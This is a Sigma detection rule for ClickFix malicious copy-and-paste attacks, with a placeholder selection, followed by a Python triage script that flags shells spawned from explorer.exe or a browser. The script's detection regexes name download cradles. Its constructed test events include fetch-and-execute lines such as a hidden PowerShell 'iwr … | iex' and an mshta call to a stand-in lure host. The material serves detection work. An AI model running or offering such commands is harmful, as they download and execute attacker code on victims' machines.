title: Malicious Copy and Paste (T1204.004)
id: df00tech-t1204-004
status: experimental
description: "Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user executes the payload themselves. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users."
references:
  - https://attack.mitre.org/techniques/T1204/004/
  - https://df00tech.com/detections/T1204.004
author: df00tech
date: 2026/04/19
tags:
  - attack.t1204.004
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - IT administrators opening PowerShell from Run dialog (Win+R → powershell) for legitimate admin tasks — suppress by allowlisting specific known-good command line patterns tied to documented admin workflows
  - "Software installation scripts that launch PowerShell from explorer.exe context during user-initiated installs (e.g., clicking a setup.exe in Explorer that chains to PowerShell)"
  - Browser native messaging hosts spawned by browser extensions for legitimate inter-process communication — these typically lack download cradle patterns but may share the browser-parent signal
  - Enterprise HTA applications (mshta.exe) that fetch content over HTTP from internal corporate servers — allowlist by internal IP/domain ranges in the ProcessCommandLine filter
level: high
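The rule's selection is still a placeholder, but its false-positive notes already spell out the signal: an interactive shell or mshta.exe whose parent is explorer.exe (the Run dialog) or a browser, with a download cradle or encoded payload on the command line, minus internal HTA servers and documented admin command lines. The script below is an added example, not df00tech's rule or query, that turns that signal into runnable triage over constructed Sysmon-style process_creation events. Field names (Image, ParentImage, CommandLine, EventRecordID) follow Sysmon Event ID 1 / Sigma naming; the parent and child process sets, the cradle regexes, the hosts and the allowlist entries are assumptions made for the example.

```python
"""ClickFix (T1204.004) process-creation triage.

Added example, not part of the df00tech rule. It encodes the signal implied by
the rule's false-positive notes: a shell or mshta.exe spawned by explorer.exe
(Win+R) or a browser, carrying a download cradle or encoded payload, is flagged;
internal HTA servers and known-good admin command lines are allowlisted.
Field names follow Sysmon Event ID 1 / Sigma process_creation naming; the
events, hosts and allowlist entries are constructed for the example.
"""
import base64
import re

# Assumed child/parent pairing for the Run-dialog and browser-initiated paths.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Download cradle, inline execution and encoded-payload indicators.
CRADLE_PATTERNS = [
    re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I),
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
]

# Hypothetical allowlists for the rule's documented false positives.
INTERNAL_HOSTS = re.compile(r"https?://(?:10\.|192\.168\.|intranet\.example\.local)", re.I)
ADMIN_ALLOWLIST = [
    re.compile(r"Invoke-WebRequest\s+https://updates\.example\.local/", re.I),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return 'alert', 'allowlisted', or None for one process_creation event."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    if image not in SHELL_CHILDREN or parent not in USER_PARENTS:
        return None  # not the Run-dialog / browser-parent path
    if not any(p.search(cmd) for p in CRADLE_PATTERNS):
        return None  # interactive shell without a cradle: ordinary admin use
    if INTERNAL_HOSTS.search(cmd) or any(p.search(cmd) for p in ADMIN_ALLOWLIST):
        return "allowlisted"
    return "alert"


def triage(events):
    """Pair each event's EventRecordID with its verdict."""
    return [(e["EventRecordID"], classify(e)) for e in events]


# Constructed events; hosts use reserved example/invalid names.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC_BENIGN = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
EVENTS = [
    {"EventRecordID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr https://lure.invalid/x.txt | iex"'},
    {"EventRecordID": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://lure.invalid/verify.hta"},
    {"EventRecordID": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://intranet.example.local/helpdesk/app.hta"},
    {"EventRecordID": 4, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Get-Service -Name Spooler"},
    {"EventRecordID": 5, "Image": PS,
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": f"powershell -nop -enc {ENC_BENIGN}"},
    {"EventRecordID": 6, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell iwr https://updates.example.local/agent.ps1 -OutFile agent.ps1"},
    {"EventRecordID": 7, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Invoke-WebRequest https://updates.example.local/agent.ps1 -OutFile agent.ps1"},
]

if __name__ == "__main__":
    for rec, verdict in triage(EVENTS):
        print(rec, verdict)
```

Records 1, 2 and 5 alert (explorer.exe or chrome.exe parent plus a cradle or encoded command), 3 and 7 are suppressed by the internal-host and admin allowlists, 4 is an interactive shell with no cradle, and 6 has a service parent rather than a user-driven one. In a production rule the parent/child filter belongs in the Sigma selection and the allowlists in a filter condition, so the exclusions stay reviewable alongside the rule.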
